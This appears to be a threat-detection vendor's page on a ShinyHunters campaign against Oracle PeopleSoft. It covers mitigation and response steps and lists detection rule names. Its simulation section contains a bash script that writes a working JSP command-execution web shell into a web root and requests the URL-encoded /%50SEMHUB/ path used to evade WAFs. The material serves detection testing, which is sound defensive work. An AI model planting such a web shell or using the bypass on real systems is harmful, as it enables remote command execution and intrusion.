ShinyHunters Resumes Large-Scale Attacks Targeting Oracle PeopleSoft
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The threat actor UNC6240 (ShinyHunters) has resumed large-scale exploitation of Oracle PeopleSoft systems through CVE-2026-35273. The campaign leverages URL-encoded paths to circumvent Web Application Firewalls (WAF) and access the vulnerable Environment Management Hub endpoint. Attackers deploy multiple web shells alongside the SIDEEYE backdoor to establish persistence, maintain unauthorized access, and facilitate data exfiltration.
Investigation
Mandiant and Google Threat Intelligence Group documented a transition from zero-day exploitation in June 2026 to N-day attacks against unpatched environments. Researchers identified the use of URL-encoding (/%50SEMHUB/) to bypass string-based WAF filtering. Analysis revealed a recurring attack sequence involving target validation through serialized Java objects, followed by the deployment of trojanized installers and tunneling utilities.
Mitigation
Organizations should immediately install the Oracle Security Alert patch addressing CVE-2026-35273 and disable or remove the PSEMHUB application. WAF configurations should inspect and block normalized URL paths instead of relying exclusively on literal string matching. Security teams should also rotate credentials accessible from the web tier and examine application directories for suspicious or unauthorized files.
Response
If a web shell is discovered, defenders should consider the affected host fully compromised and preserve forensic evidence before remediation. Enable host-level auditing to identify unexpected shell processes launched by the WebLogic Java process. Rotate exposed credentials, including database connection strings and cloud credentials, while reviewing outbound network activity for known C2 indicators.
Attack Flow
We are still updating this part.
Detections
Possible System Enumeration (via cmdline)
Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
Possible Base64 Encoded Strings Manipulation (via cmdline)
Remote File Upload / Download via Standard Tools (via cmdline)
IOCs (HashSha256) to detect: ShinyHunters Renewed Mass Exploitation Campaign Targeting Oracle PeopleSoft
IOCs (SourceIP) to detect: ShinyHunters Renewed Mass Exploitation Campaign Targeting Oracle PeopleSoft
IOCs (DestinationIP) to detect: ShinyHunters Renewed Mass Exploitation Campaign Targeting Oracle PeopleSoft
Web Shell Deployment via Exploitation of CVE-2026-35273 [Windows Process Creation]
UNC6240 Exploitation of Oracle PeopleSoft using Web Shells [Webserver]
Simulation Execution
-
Attack Narrative & Commands: The adversary identifies an Oracle PeopleSoft instance and seeks to exploit a vulnerability. To bypass simple WAF signatures looking for the string “PSEMHUB”, the attacker uses URL encoding to request
/%50SEMHUB/. Upon successful exploitation, the attacker drops a web shell namedx.jspinto the web root to provide a persistent interface for command execution. This sequence mimics the specific indicators of compromise (IOCs) identified in the UNC6240 exploitation campaign. -
Regression Test Script:
#!/bin/bash # Simulation Script for UNC6240 Web Shell Detection # 1. Define paths (Adjust based on target environment) WEB_ROOT="/var/www/html" SHELL_NAME="x.jsp" TARGET_URL="http://localhost/%50SEMHUB/" echo "[+] Creating simulated web shell: $WEB_ROOT/$SHELL_NAME" # Create a simple JSP web shell content echo '<% out.print(new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("\A").next()); %>' | sudo tee $WEB_ROOT/$SHELL_NAME > /dev/null echo "[+] Triggering detection via URL-encoded request..." # Use curl to request the encoded path to generate the log entry curl -s "$TARGET_URL" > /dev/null echo "[+] Simulation complete. Check SIEM for detection." -
Cleanup Commands:
#!/bin/bash # Cleanup Script WEB_ROOT="/var/www/html" SHELL_NAME="x.jsp" echo "[+] Cleaning up simulation files..." sudo rm -f $WEB_ROOT/$SHELL_NAME echo "[+] Cleanup finished."